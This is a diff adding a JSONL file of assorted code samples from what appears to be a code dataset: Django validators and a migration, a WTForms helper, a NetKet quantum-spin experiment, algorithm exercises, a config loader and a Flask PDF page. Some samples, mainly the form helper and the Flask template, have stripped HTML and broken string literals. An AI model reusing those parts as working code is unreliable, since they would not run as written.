diff --git "a/3526.jsonl" "b/3526.jsonl"
new file mode 100644--- /dev/null
+++ "b/3526.jsonl"
@@ -0,0 +1,688 @@
+{"seq_id":"383308904","text":"import h5py\nimport os\nimport numpy as np\nimport json\nfrom other.config import BATCH_SIZE\nimport json\nfrom collections import defaultdict\n# import tensorflow as tf\n\ndef read_hdf5(hdf5_path, ann_path, is_debug):\n h = h5py.File(hdf5_path)\n c = read_captions(ann_path)\n # ann_list = os.listdir(ann_path)\n # ann_ids = []\n # [ann_ids.append(int(id[15:-4])) for id in ann_list]\n\n\n names = []\n embeddings = [] # 每个image有5条embedding\n captions = []\n\n h_items = h.items()\n cnt = 0\n total = BATCH_SIZE if is_debug else len(h_items)\n for hh in h_items:\n # id = int(hh[0][15:-4])\n # if ann_ids.count(id)<1:\n # continue\n names.append(hh[0])\n embeddings.append(np.array(hh[1])[0:5]) # 注意!有一个图片对应了6个caption,导致封装np.array的时候出错!\n captions.append(c[hh[0]][0:5])\n cnt+=1\n if cnt>=total:\n print('read_hdf5 finished. Total: %d'%cnt)\n break\n return names, np.array(embeddings), captions\n\n# JSON_PATH = \"/data/bo718.wang/+zhaowei/data/516data/mscoco/annotations/captions_train2014.json\"\n# SEG_PATH = \"/data/bo718.wang/zhaowei/data/516data/mscoco/train2014/mask\"\n# IMG_PATH = \"/data/bo718.wang/zhaowei/data/516data/mscoco/train2014/train2014\"\n# HDF5_PATH = \"/data/rui.wu/CZHH/Dataset_COCO/COCO_VSE_torch/COCO_vse_torch_train.hdf5\"\n\n# read_hdf5(HDF5_PATH,JSON_PATH,True)\n\n\ndef read_captions(json_path):\n image_captions = defaultdict(list)\n with open(json_path) as f:\n ic_data = json.load(f)\n for idx in range (0, len(ic_data['annotations'])):\n img_path = 'COCO_%s2014_%.12d.jpg'%('train', ic_data['annotations'][idx]['image_id'])\n image_captions[img_path].append(ic_data['annotations'][idx]['caption'])\n\n return image_captions","sub_path":"data_input/read_hdf5.py","file_name":"read_hdf5.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"501851626","text":"import re\r\n\r\nfrom django.contrib.auth import get_user_model\r\nfrom django.core.exceptions import ValidationError\r\nfrom django.utils.translation import ugettext_lazy as _\r\n\r\nUser = get_user_model()\r\n\r\n\r\ndef validate_unique_user(error_message, **criteria):\r\n existent_user = User.objects.filter(**criteria).exists()\r\n if existent_user:\r\n raise ValidationError(error_message)\r\n\r\n\r\ndef validate_username_chars(username):\r\n if not username.isalnum():\r\n raise ValidationError(\r\n _('Username \"%(username)s\" cannot contain invalid characters'),\r\n code='invalid_chars_username',\r\n params={'username': username},\r\n )\r\n\r\ndef validate_phone_number(phone_number):\r\n match_pattern = re.match(r'^\\+?\\d{9,15}$', phone_number)\r\n if not match_pattern:\r\n raise ValidationError(\r\n _('Invalid phone number'),\r\n code='invalid_phone_number',\r\n )","sub_path":"src/sleekapps/users/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"550784429","text":"from wtforms.fields.core import UnboundField\n\n\nclass FormHelperBS3(object):\n\n def render_field(self, field, **kwargs):\n # begin the frag\n frag = \"\"\n\n # deal with the first error if it is relevant\n first_error = kwargs.pop(\"first_error\", False)\n if first_error:\n frag += ''\n\n # call the correct render function on the field type\n if field.type == \"FormField\":\n frag += self._form_field(field, **kwargs)\n elif field.type == \"FieldList\":\n frag += self._field_list(field, **kwargs)\n else:\n frag += self._wrap_control_group(field, self._render_field(field, **kwargs), **kwargs)\n\n return frag\n\n def _wrap_control_group(self, field, contents, **kwargs):\n hidden = kwargs.pop(\"hidden\", False)\n container_class = kwargs.pop(\"container_class\", None)\n disabled = kwargs.pop(\"disabled\", False)\n render_subfields_horizontal = kwargs.pop(\"render_subfields_horizontal\", False)\n complete_me = kwargs.get(\"complete_me\", False)\n\n frag = '
\"\n if contents is not None:\n frag += contents\n frag += \"
\"\n\n return frag\n\n def _form_field(self, field, **kwargs):\n # get the useful kwargs\n render_subfields_horizontal = kwargs.pop(\"render_subfields_horizontal\", False)\n\n frag = \"\"\n # for each subfield, do the render\n for subfield in field:\n if render_subfields_horizontal and not (subfield.type == 'CSRFTokenField' and not subfield.value):\n subfield_width = \"3\"\n remove = []\n for kwarg, val in kwargs.items():\n if kwarg == 'subfield_display-' + subfield.short_name:\n subfield_width = val\n remove.append(kwarg)\n for rm in remove:\n del kwargs[rm]\n frag += '
\"\n else:\n frag += self._render_field(subfield, **kwargs)\n\n return self._wrap_control_group(field, frag, **kwargs)\n\n def _field_list(self, field, **kwargs):\n # for each subfield, do the render\n frag = \"\"\n for subfield in field:\n if subfield.type == \"FormField\":\n frag += self.render_field(subfield, **kwargs)\n else:\n frag = self._wrap_control_group(field, self._render_field(field, **kwargs), **kwargs)\n return frag\n\n def _render_field(self, field, **kwargs):\n # interesting arguments from keywords\n extra_input_fields = kwargs.get(\"extra_input_fields\")\n q_num = kwargs.pop(\"q_num\", None)\n maximise_width = kwargs.pop(\"maximise_width\", False)\n clazz = kwargs.get(\"class\", \"\")\n label_width = kwargs.get(\"label_width\", 3)\n field_width = 12 - label_width\n field_width = str(kwargs.get(\"field_width\", field_width))\n if label_width > 0:\n label_width = str(label_width)\n\n if field.type == 'CSRFTokenField' and not field.value:\n return \"\"\n\n frag = \"\"\n\n # If this is the kind of field that requires a label, give it one\n if field.type not in ['SubmitField', 'HiddenField', 'CSRFTokenField']:\n if q_num is not None:\n frag += ''\n if label_width != 0:\n frag += '\"\n\n # determine if this is a checkbox\n is_checkbox = False\n if (field.type == \"SelectMultipleField\"\n and field.option_widget.__class__.__name__ == 'CheckboxInput'\n and field.widget.__class__.__name__ == 'ListWidget'):\n is_checkbox = True\n\n extra_class = \"\"\n if is_checkbox:\n extra_class += \" checkboxes\"\n\n frag += '
'\n if field.type == \"RadioField\":\n for subfield in field:\n frag += self._render_radio(subfield, **kwargs)\n elif is_checkbox:\n frag += '
'\n for subfield in field:\n frag += self._render_checkbox(subfield, **kwargs)\n frag += \"
\"\n else:\n if maximise_width:\n clazz += \" col-xs-12\"\n kwargs[\"class\"] = clazz\n render_args = {}\n # filter anything that shouldn't go in as a field attribute\n for k, v in kwargs.items():\n if k in [\"class\", \"style\", \"disabled\"] or k.startswith(\"data-\"):\n render_args[k] = v\n frag += field(**render_args) # FIXME: this is probably going to do some weird stuff\n\n # FIXME: field.value isn't always set\n #if field.value in extra_input_fields.keys():\n # extra_input_fields[field.value](**{\"class\" : \"extra_input_field\"})\n\n if field.errors:\n frag += '
\"\n frag += field(**kwargs)\n frag += ''\n\n if field.label.text in list(extra_input_fields.keys()):\n eif = extra_input_fields[field.label.text]\n if not isinstance(eif, UnboundField):\n frag += \" \" + extra_input_fields[field.label.text](**{\"class\" : \"extra_input_field\"})\n\n frag += \"
\"\n return frag\n","sub_path":"portality/formcontext/formhelper.py","file_name":"formhelper.py","file_ext":"py","file_size_in_byte":7937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"487727362","text":"n,c = map(int,input().split())\na = []\nfor _ in range(n):\n a.append(int(input()))\na.sort()\nleft = 0\nright = a[-1] - a[0]\nans = -1\nwhile left<=right:\n x = (left+right)//2\n cnt = 1\n cur = 0\n for i in range(1,n):\n if a[i] - a[cur] >= x:\n cnt+=1\n cur = i\n if cnt >=c:\n ans = x\n left = x+1\n else:\n right = x-1\nprint(ans)\n\n","sub_path":"Silver1/공유기 설치.py","file_name":"공유기 설치.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"49491361","text":"import multiprocessing as mp\nimport json\nimport os\nfrom qutip import *\nimport numpy as np\nimport scipy\nimport matplotlib.pyplot as plt\nplt.style.use('seaborn')\nfrom matplotlib import gridspec\nimport itertools\nfrom numpy.random import seed\nfrom scipy import optimize\nfrom functools import wraps\nimport time\nimport netket as nk\nfrom netket.operator import local_values as _local_values\nfrom netket._core import deprecated\nfrom netket.stats import (\n statistics as _statistics,\n mean as _mean,\n)\nimport copy\nimport pickle\nfrom pickle import load, dump\nimport collections\nfrom collections import OrderedDict\n\n\n# Wrapper to time functions\ndef timing(f):\n @wraps(f)\n def wrap(*args, **kw):\n ti = time.time()\n result = f(*args, **kw)\n tf = time.time()\n t = tf - ti\n return result, t\n\n return wrap\n\n# Make basis and get sz values\ndef operatorCreation(N):\n # operator definitionis\n si = qeye(2)\n sx = 0.5 * sigmax()\n sy = 0.5 * sigmay()\n sz = 0.5 * sigmaz()\n sx_list = []\n sy_list = []\n sz_list = []\n for n in range(N):\n op_list = []\n for m in range(N):\n op_list.append(si)\n op_list[n] = sx\n sx_list.append(tensor(op_list))\n op_list[n] = sy\n sy_list.append(tensor(op_list))\n op_list[n] = sz\n sz_list.append(tensor(op_list))\n op_list[n] = si\n id = tensor(op_list)\n return sx_list, sy_list, sz_list, id\n\n# Construct Hamiltonian\ndef hamiltonian(N, B, A0):\n sx_list = operatorCreation(N)[0]\n sy_list = operatorCreation(N)[1]\n sz_list = operatorCreation(N)[2]\n H = B * sz_list[0]\n for n in range(N - 1):\n H += A0 * sz_list[0] * sz_list[n + 1] + A0 * sx_list[0] * sx_list[n + 1] + A0 * sy_list[0] * sy_list[n + 1]\n return H\n\n# Get Ground State Energy and Wavefuntion\nclass GroundState:\n def __init__(self, N, B, A0):\n self.hamiltonian = hamiltonian(N, B, A0)\n @timing\n def __call__(self):\n # find ground state\n H = self.hamiltonian\n groundState = H.groundstate()\n return groundState[0], groundState[1]\n\n# Make basis and get sz values\ndef basisCreation(N):\n sz_list = operatorCreation(N)[2]\n Sbasis = []\n basisState = []\n for j in range(2):\n basisState.append(basis(2, j))\n b = itertools.product(basisState, repeat=N)\n basisTensor = list(b)\n # makes Sbasis the correct dimesion of Qobj\n for i in range(2 ** N):\n c = basisTensor[i][0]\n for j in range(N - 1):\n c = tensor(c, basisTensor[i][j + 1])\n Sbasis.append(c)\n # get sz values for basis states\n sz = np.zeros((2 ** N, N), dtype=complex)\n a = [[1 for j in range(N)] for i in range(2 ** N)]\n for i in range(2 ** N):\n for j in range(N):\n # matrix element \n sz[i][j] = sz_list[j].matrix_element(Sbasis[i], Sbasis[i])\n return Sbasis, sz\n\n# get randomized RBM parameters (between zero and 1)\ndef ranRBMpar(N, M):\n np.random.seed(int.from_bytes(os.urandom(4), byteorder='little'))\n par = 1 - 2 * np.random.rand(2 * (N + M + N * M))\n return par\n\n# Function to give RBM wavefuntion\ndef RBM_ansatz(par, N, M,basis):\n Sbasis = basis[0]\n sz = basis[1]\n # make parmeters complex\n num = N + M + N * M\n parC = np.vectorize(complex)(par[:num], par[num:])\n a = parC[:N]\n b = parC[N:N + M]\n W = parC[N + M:].reshape(M, N)\n expTerm = np.zeros(2 ** N, dtype=complex)\n coshTerm = np.zeros((M, 2 ** N), dtype=complex)\n psiMValues = np.zeros(2 ** N, dtype=complex)\n psiM = 0 * Sbasis[0]\n\n for i in range(2 ** N):\n for m in range(M):\n coshTerm[m][i] = 2 * np.cosh(np.dot(W[m], sz[i]) + b[m])\n hidProduct = np.prod(coshTerm, axis=0)\n\n for i in range(2 ** N):\n expTerm[i] = np.exp(np.dot(a, sz[i]))\n psiMValues[i] = expTerm[i] * hidProduct[i]\n psiM += psiMValues[i] * Sbasis[i]\n psiNorm = psiM.unit()\n return psiNorm\n\n# Error Calculation\ndef err(found_gs, gs, found_gsEnergy, gsEnergy):\n engErr = np.abs(found_gsEnergy - gsEnergy)\n waveFunctionErr = found_gs.dag() * gs\n waveFunctionErr = 1 - waveFunctionErr.norm()\n return engErr, waveFunctionErr\n\n\n# **** NetKet RBM ****\n\n#Central Spin Hamiltonian and Hilbert space defined in NetKet objects\ndef hamiltonianNetKet(N, B, A):\n # Make graph with no edges of length N\n #g = nk.graph.Edgeless(N)\n g = nk.graph.Hypercube(length=N, n_dim=1, pbc=False)\n # Spin based Hilbert Space\n hi = nk.hilbert.Spin(s=0.5, graph=g)\n # Define sigma matrices\n sigmaz = -0.5 * np.array([[1, 0], [0, -1]])\n sigmax = 0.5 * np.array([[0, 1], [1, 0]])\n sigmay = -0.5 * np.array([[0, -1j], [1j, 0]])\n operators = []\n sites = []\n\n # Central spin term\n operators.append((B * sigmaz).tolist())\n sites.append([0])\n # Iteraction term\n itOp = np.kron(sigmaz, sigmaz) + np.kron(sigmax, sigmax) + np.kron(sigmay, sigmay)\n for i in range(N - 1):\n operators.append((A * itOp).tolist())\n sites.append([0, (i+1)])\n\n print('sites: ', sites)\n print('operators: ', operators)\n ha = nk.operator.LocalOperator(hi, operators=operators, acting_on=sites)\n res = nk.exact.lanczos_ed(ha, first_n=1, compute_eigenvectors=False)\n print(\"NetLEt ground state energy = {0:.3f}\".format(res.eigenvalues[0]))\n #Returns Hamiltonian and Hilbert space\n return ha, hi\n\n# Sampler\ndef samplingNetKet(n_samples, sampler, hamiltonian):\n n_discard = 0.1*n_samples\n batch_size = sampler.sample_shape[0]\n print(batch_size)\n n_samples_chain = int(np.ceil((n_samples / batch_size)))\n n_samples_node = int(np.ceil(n_samples_chain / nk.MPI.size()))\n # Burnout phase\n for _ in sampler.samples(n_discard):\n pass\n sam = np.ndarray((n_samples_node, batch_size, hamiltonian.hilbert.size))\n # Generate samples and store them\n for i, sample in enumerate(sampler.samples(n_samples_node)):\n sam[i] = sample\n return sam\n\n\n# Calculates Local energy of samples\ndef energyLocalNetKet(par, N, M, H, basis, v):\n v = v.dag()\n psiM = RBM_ansatz(par, N, M, basis)\n E = v*H*psiM\n norm = v.overlap(psiM)\n Enorm = E/norm\n return Enorm.full()[0][0]\n\n# Exact Digonalization NetKet\ndef exactDigonalization(ha):\n haMatrix = ha.to_dense()\n e, v = np.linalg.eigh(haMatrix)\n inds = np.argsort(e)\n e = e[inds]\n v = v[:, inds]\n return e, v\n\n# Define Netket RBM\nclass NetKetRBM:\n def __init__(self,N,ha,hi,alpha, ma):\n self.ha,self.hi, self.ma = ha, hi, ma\n self.N = N\n # Define sampler\n self.sa = nk.sampler.MetropolisLocal(machine=self.ma)\n # Optimizer\n self.op = nk.optimizer.Sgd(learning_rate=0.05)\n\n def __call__(self,basis):\n gs = nk.Vmc(\n hamiltonian=self.ha,\n sampler=self.sa,\n optimizer=self.op,\n n_samples=1000,\n n_discard=None,\n sr=None,\n )\n start = time.time()\n gs.run(output_prefix='RBM', n_iter=600)\n end = time.time()\n runTime = end-start\n # import the data from log file\n data = json.load(open(\"../RBM.log\"))\n # Extract the relevant information\n iters = []\n energy_RBM = []\n\n for iteration in data[\"Output\"]:\n iters.append(iteration[\"Iteration\"])\n engTemp = iteration[\"Energy\"][\"Mean\"]\n energy_RBM.append(engTemp)\n finalEng = energy_RBM[-1]\n # Create GS Vector\n maArray = self.ma.to_array()\n finalState = maArray[3] * basis[0][0] + maArray[2] * basis[0][1] + maArray[1] * basis[0][2] + maArray[0]*basis[0][3]\n return finalEng, finalState, runTime\n\nclass NetKetSR:\n def __init__(self, N, ha, hi, alpha, ma):\n self.ha, self.hi, self.ma = ha, hi, ma\n self.N = N\n # Define sampler\n self.sa = nk.sampler.MetropolisLocal(machine=self.ma)\n # Optimizer\n self.op = nk.optimizer.Sgd(learning_rate=0.05)\n\n def __call__(self, basis):\n gs = nk.variational.Vmc(hamiltonian=self.ha,\n sampler=self.sa,\n optimizer=self.op,\n n_samples=1000,\n use_iterative=True,\n method='Sr')\n start = time.time()\n gs.run(output_prefix='RBM', n_iter=600)\n end = time.time()\n runTime = end - start\n # import the data from log file\n data = json.load(open(\"../RBM.log\"))\n # Extract the relevant information\n iters = []\n energy_RBM = []\n\n for iteration in data[\"Output\"]:\n iters.append(iteration[\"Iteration\"])\n engTemp = iteration[\"Energy\"][\"Mean\"]\n energy_RBM.append(engTemp)\n finalEng = energy_RBM[-1]\n # Create GS Vector\n maArray = self.ma.to_array()\n finalState = 0\n for i in range(2 ** self.N):\n finalState += maArray[2 ** self.N - i - 1] * basis[0][i]\n return finalEng, finalState, runTime\n\n# Change RBM parameters to netKet RBM paramters, and loads machine\ndef covertParams(N,M,par, ma):\n # Change to a,b,w\n num = N + M + N * M\n parC = np.vectorize(complex)(par[:num], par[num:])\n a = parC[:N]\n a = [0.5 * x for x in a]\n b = parC[N:N + M]\n w = parC[N + M:].reshape(M, N)\n w = [0.5 * x for x in w]\n w = np.array(w).T\n rbmOrderedDict = OrderedDict([('a', a), ('b', b), ('w', w)])\n # Save parameters so they can be loaded into the netket machine\n with open(\"../../../Data/07-28-20/paramsGS.json\", \"wb\") as output:\n dump(rbmOrderedDict, output)\n # Load into ma\n ma.load(\"Data/07-28-20/paramsGS.json\")\n\n\n\n# Hamiltionian Parameters\nB=1\nA=1\nN = 2\n# RBM Parameters\n# ALPHA NEEDS TO BE AN INTEGER!!!\nalpha = 1\nM = alpha*N\nbasis = basisCreation(N)\n\nH = hamiltonian(N,B,A)\n\n# ** NETKET OBJECTS ***\nha,hi = hamiltonianNetKet(N, B, A)\n# Define machine\nma = nk.machine.RbmSpin(alpha = alpha, hilbert=hi, use_visible_bias = True, use_hidden_bias = True)\n# Define sampler\nsa = nk.sampler.MetropolisLocal(machine=ma, n_chains=20)\n\n# Exact Diagonalization\ngroundState = GroundState(N, B, A)\ned = groundState()\nedEng = ed[0][0]\nedState = ed[0][1]\nprint('Ground State: ', edState)\n\n# # Histogram All\nhisIt = np.arange(1)\nengErrNK = []\nstateErrNK = []\nrunTimeNK = []\nengErrSR = []\nstateErrSR = []\nrunTimeSR = []\nparams = []\n\n\nfor i in range(len(hisIt)):\n # Create RBM Parameters\n randomParams = ranRBMpar(N, M)\n print(randomParams)\n params.append(randomParams.tolist())\n # Update NetKet machine with randomParams\n covertParams(N, M, randomParams, ma)\n maArray = ma.to_array()\n finalState = 0\n for i in range(2 ** N):\n finalState += maArray[2 ** N - i - 1] * basis[0][i]\n\n # NK Run\n rbmNK = NetKetRBM(N, ha, hi, alpha, ma)\n engNKTemp, stateNKTemp, runTimeNKTemp = rbmNK(basis)\n print('NK State ', stateNKTemp)\n E = expect(H, stateNKTemp)\n norm = stateNKTemp.norm() ** 2\n Enorm = E / norm\n print('NK Energy From State ', Enorm )\n print('NK Energy', engNKTemp)\n runTimeNK.append(runTimeNKTemp)\n errNK = err(stateNKTemp, edState, engNKTemp, edEng)\n engErrNK.append(errNK[0])\n stateErrNK.append(errNK[1])\n\n # NK Run\n rbmSR = NetKetSR(N, ha, hi, alpha, ma)\n engSRTemp, stateSRTemp, runTimeSRTemp = rbmSR(basis)\n runTimeSR.append(runTimeSRTemp)\n errSR = err(stateSRTemp, edState, engSRTemp, edEng)\n engErrSR.append(errSR[0])\n stateErrSR.append(errSR[1])\n\n\n# Save data to JSON file\ndata = [engErrNK,engErrSR, stateErrNK, stateErrSR, runTimeNK,runTimeSR]\nfileName = \"Data/07-28-20/NetKetN\"+str(N)+\"M\" + str(M)+\"B\"+str(B)+\".json\"\nopen(fileName, \"w\").close()\nwith open(fileName, 'a') as file:\n for item in data:\n line = json.dumps(item)\n file.write(line + '\\n')\n\n# Save RBM Paramarers data to JSON file\ndata = params\nfileName = \"Data/07-28-20/ParamsN\"+str(N)+\"M\" + str(M)+\"B\"+str(B)+\".json\"\nopen(fileName, \"w\").close()\nwith open(fileName, 'a') as file:\n for item in data:\n line = json.dumps(item)\n file.write(line + '\\n')\n\n# Plotting\nallEngErr = [engErrNK,engErrSR]\nallStateErr = [stateErrNK,stateErrSR]\nallRunTime = [ runTimeNK, runTimeSR]\nlabels = ['Gradient Descent','Stochastic Reconfiguration']\ncolors = ['blue', 'green']\n\nhisIt= np.arange(len(engErrNK))\n#plt.figure(constrained_layout=True)\nplt.figure(figsize=(10,10))\nttl = plt.suptitle(\"Comparison of NetKet and Non-NetKet RBM \\n N = \" + str(N)+\", B = \"+str(B)+\", M = \" + str(M),size =20)\ngs = gridspec.GridSpec(ncols=3, nrows=3, hspace = 0.4)\nttl.set_position([.5, 0.94])\n\nax1 = plt.subplot(gs[0, 0])\nax1.hist(allEngErr, bins=10, color = colors, label=labels)\nax1.set_xlabel(\"$\\Delta E = |E_{RBM}-E_{ED}|$\",size = 15)\n\nax2 = plt.subplot(gs[0, 1])\nax2.hist(allStateErr, bins=10, color = colors, label=labels)\nax2.set_xlabel(\"$1-|<\\Psi_{RBM}|\\Psi_{ED}>|^2$\",size = 15)\n\nax3 = plt.subplot(gs[0, 2])\nax3.hist(allRunTime, bins=10, color = colors)\nax3.set_xlabel(\"Runtime (s)\",size = 15)\n\nax4 = plt.subplot(gs[1, :])\nax4.scatter(hisIt,engErrNK, color = 'blue')\nax4.scatter(hisIt,engErrSR, color = 'green',marker = '>')\nax4 .set_ylabel(\"$\\Delta E = |E_{RBM}-E_{ED}|$\", size = 15)\n\nax1.legend(labels, loc = (0, -3.3),fontsize = 12,ncol=3)\n\nax5 = plt.subplot(gs[2, :])\nax5.scatter(hisIt,runTimeNK, color = 'blue')\nax5.scatter(hisIt,runTimeSR, color = 'green',marker = '>')\nax5.set_xlabel(\"Run Number\",size = 15)\nax5 .set_ylabel(\"Runtime (s)\", size = 15)\nplt.show()\n\n\n# PLOT ONE RUN\n#\n#\n# # Create RBM Parameters\n# randomParams = ranRBMpar(N, M)\n# # Update NetKet machine with randomParams\n# covertParams(N, M, randomParams, ma)\n#\n# # Exact Diagonalization\n# groundState = GroundState(N, B, A)\n# ed = groundState()\n# edEng = ed[0][0]\n# edState = ed[0][1]\n#\n#\n# # NetKet Run\n# rbmNK = NetKetRBM(N, ha, hi, alpha, ma)\n# engNK, stateNK, runTimeNK= rbmNK(basis)\n# print('Eng, State, Runtime ', engNK, stateNK, runTimeNK)\n# errNK = err(stateNK,edState,engNK,edEng)\n# print('eng error: ', errNK[0])\n# print('state error: ', errNK[1])\n#\n#\n# # Get iteration information\n# data = json.load(open(\"RBM.log\"))\n# iters = []\n# energy_RBM = []\n# for iteration in data[\"Output\"]:\n# iters.append(iteration[\"Iteration\"])\n# engTemp = iteration[\"Energy\"][\"Mean\"]\n# energy_RBM.append(engTemp)\n#\n# # Plot Iteration\n# fig, ax1 = plt.subplots()\n# plt.title('NetKet Central Spin Iteration N = 3, M = 3, B = 1, A = 1 ', size=20)\n# ax1.plot(iters, energy_RBM - exact_gs_energy, color='red', label='Energy (RBM)')\n# ax1.set_ylabel('Energy Error')\n# #ax1.set_ylim(0,1.5)\n# ax1.set_xlabel('Iteration')\n# #plt.axis([0,iters[-1],exact_gs_energy-0.03,exact_gs_energy+0.2])\n# plt.show()","sub_path":"Deprecated/NetKet2/NetKet_Testing/NetKetScaling.py","file_name":"NetKetScaling.py","file_ext":"py","file_size_in_byte":14760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"40476791","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('administracion', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Localidad',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre', models.CharField(max_length=200)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='cliente',\n name='contacto',\n field=models.CharField(max_length=200, null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='cliente',\n name='contacto_a',\n field=models.CharField(max_length=200, null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='cliente',\n name='direccion',\n field=models.CharField(max_length=200, null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='cliente',\n name='localidad',\n field=models.ForeignKey(to='administracion.Localidad', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='cliente',\n name='telefono',\n field=models.CharField(max_length=20, null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='cliente',\n name='telefono_a',\n field=models.CharField(max_length=20, null=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"administracion/migrations/0002_auto_20140917_1322.py","file_name":"0002_auto_20140917_1322.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"162261635","text":"\"\"\"\nExample\nGiven a binary search tree:\n\n 4\n / \\\n 2 5\n / \\\n1 3\nreturn 1<->2<->3<->4<->5\n\"\"\"\n\"\"\"\nDefinition of Doubly-ListNode\nclass DoublyListNode(object):\n def __init__(self, val, next=None):\n self.val = val\n self.next = self.prev = nextDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param root: The root of tree\n @return: the head of doubly list node\n \"\"\"\n def bstToDoublyList(self, root):\n # write your code here\n dfs = []\n self.inorder(root, dfs)\n if len(dfs) == 0:\n return None\n\n head = None\n prev = None\n for val in dfs:\n node = DoublyListNode(val)\n if head is None:\n head = node\n else:\n prev.next = node\n node.prev = prev\n prev = node\n\n return head\n\n\n # Left middle right\n def inorder(self, root, dfs):\n if root is None:\n return\n self.inorder(root.left, dfs)\n dfs.append(root.val)\n self.inorder(root.right, dfs)\n","sub_path":"daily challenge/7.Convert Binary Search Tree to Doubly Linked List.py","file_name":"7.Convert Binary Search Tree to Doubly Linked List.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"125211163","text":"'''------------------------------------------------------------------------------------------------\nProgram: config\nVersion: 0.0.4\nPy Ver: 2.7\nPurpose: Small helper program designed to load a program's config\n file.\n\nDependents: os\n sys\n json\n\nDeveloper: J. Berendt\nEmail: support@73rdstreetdevelopment.co.uk\n\nUse: >>> import utils.config\n >>> CONFIG = config.loadconfig()\n\n---------------------------------------------------------------------------------------------------\nUPDATE LOG:\nDate Programmer Version Update\n02.10.16 J. Berendt 0.0.1 Written\n29.11.16 J. Berendt 0.0.2 New loadconfig parameters:\n - filename (default=config.json)\n - devmode (default=False)\n Added docstring to program.\n Added error handling if the config file does not exist.\n Cleaned code to confirm to PEP8. pylint (10/10)\n - WARNING: This will break programs currently using\n this module!\n22.03.17 J. Berendt 0.0.3 Added a test to determine if the filename is a path,\n or filename only. If full path, the devmode / path\n deciphering is bypassed.\n This allows a calling program to pass in a full path to\n the config file, without it being altered.\n14.05.17 J. Berendt 0.0.4 Updated to sit within the utils library.\n Incomplete code warning: added filename parameter to\n the os.path.dirname check.\n Simplified __fromjson function. pylint (10/10)\n Renamed function/method names to replace double leading\n underscore with single underscore.\n------------------------------------------------------------------------------------------------'''\n\nimport os\nimport sys\nimport json\nfrom _version_config import __version__\n\n#-----------------------------------------------------------------------\n#METHOD FOR GENERAL SETUP\ndef loadconfig(filename='config.json', devmode=False):\n\n '''\n DESIGN:\n Function designed to load and return a program's JSON config file\n as a dictionary.\n\n The devmode parameter can be used if you are programming through an\n IDE which defaults the sys.argv[0] value to the cwd of the IDE,\n rather than from where the program is actually being run.\n It just makes design and debugging easier.\n\n PREREQUESITES / ASSUMPTIONS:\n - The config file is a JSON file\n - The config file lives in the program directory\n\n USE:\n > import utils.config as config\n > c = config.loadconfig()\n\n > param_value = c['someparam_name']\n '''\n\n #TEST IF FULL PATH OR ONLY FILENAME WAS PASSED\n if os.path.dirname(filename) == '':\n\n #TEST PROGRAM MODE\n if devmode:\n\n #STORE PROGRAM DIRECTORY\n path_base = os.getcwd()\n\n else:\n\n #ASSIGN DIRECTORIES\n progdir = os.path.dirname(os.path.realpath(sys.argv[0]))\n curdir = os.getcwd()\n\n #TEST AND STORE PROGRAM DIRECTORY\n path_base = progdir if sys.argv[0] != '' else curdir\n\n #CONSOLIDATE PATH AND FILENAME\n fullpath = os.path.join(path_base, filename)\n\n else:\n\n #ASSIGN PASSED PATH/FILENAME TO TESTED VARIABLE\n fullpath = filename\n\n\n #TEST IF THE FILE EXISTS\n if os.path.exists(fullpath):\n\n #LOAD CONFIG FILE\n return _fromjson(filepath=fullpath)\n\n else:\n\n #USER NOTIFICATION\n raise UserWarning('The config file (%s) could not be found.' % (fullpath))\n return None\n\n\n#-----------------------------------------------------------------------\n#FUNCTION FOR READING THE CONFIG FILE INTO A DICTIONARY\ndef _fromjson(filepath):\n\n #OPEN AND READ CONFIG FILE >> RETURN AS DICT\n with open(filepath, 'r') as config: return json.load(config)\n","sub_path":"utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"546397634","text":"from flask import Flask, render_template, request, make_response, send_file, send_from_directory, abort\r\nfrom fpdf import FPDF, HTMLMixin #para el pdf\r\nfrom datetime import date\r\nfrom fpdf import FPDF, HTMLMixin\r\n\r\ndef generadorPeticion():\r\n\r\n modHTML = open(\"./templates/form_peticion.html\",\"w\")\r\n modHTML.write(\r\n \"\"\"\r\n{%extends 'layout.html'%} \r\n{%block content%}\r\n\r\n\r\n\r\n
Si todo está en orden, descarga aquí tu Poder en PDF
